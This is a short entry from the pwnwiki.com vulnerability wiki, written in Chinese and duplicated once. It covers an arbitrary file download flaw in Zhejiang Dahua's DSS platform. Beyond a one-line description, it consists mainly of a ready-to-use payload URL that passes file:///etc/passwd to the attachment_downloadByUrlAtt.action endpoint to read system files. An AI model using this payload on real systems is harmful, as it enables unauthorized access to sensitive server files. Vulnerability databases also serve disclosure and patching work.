免费、自由、人人可编辑的漏洞库
,
漏洞简介
浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。
Payload
http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
免费、自由、人人可编辑的漏洞库--pwnwiki.com
免费、自由、人人可编辑的漏洞库
,
浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。
http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
免费、自由、人人可编辑的漏洞库--pwnwiki.com